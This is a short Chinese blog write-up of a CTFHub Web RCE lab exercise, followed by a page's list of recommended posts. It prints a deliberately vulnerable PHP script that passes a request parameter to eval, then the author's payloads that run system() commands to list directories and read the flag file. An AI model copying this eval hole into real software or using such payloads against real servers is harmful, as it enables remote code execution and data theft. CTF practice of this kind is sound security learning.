CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
ndjnddjxn8 小时前
Rust学习
开发语言·学习·rust
菜鸟‍8 小时前
【后端学习】MySQL数据库
数据库·后端·学习·mysql
陈天伟教授8 小时前
基于学习的人工智能(1)机器学习
人工智能·学习
im_AMBER8 小时前
Leetcode 59 二分搜索
数据结构·笔记·学习·算法·leetcode
专注于大数据技术栈8 小时前
java学习--final
java·开发语言·学习
田里的水稻8 小时前
AI_常见“XX学习”术语速查表
人工智能·学习
Nan_Shu_6149 小时前
学习:Sass
javascript·学习·es6
天殇凉9 小时前
AC自动机学习笔记
java·笔记·学习
AA陈超9 小时前
从0开始学习 **Lyra Starter Game** 项目
c++·笔记·学习·游戏·ue5·lyra
rchmin11 小时前
Prompt Engineering 从入门到精通的系统学习路径
人工智能·学习·prompt
热门推荐
01GitHub 镜像站点02BongoCat - 跨平台键盘猫动画工具03【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连04UV安装并设置国内源05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Linux下V2Ray安装配置指南07Google Antigravity:无法登录?早期错误、登录修复和用户反馈指南08Labelme从安装到标注:零基础完整指南09全球最强模型Grok4,国内已可免费使用!(附教程)1046个Nano-banana 精选提示词,持续更新中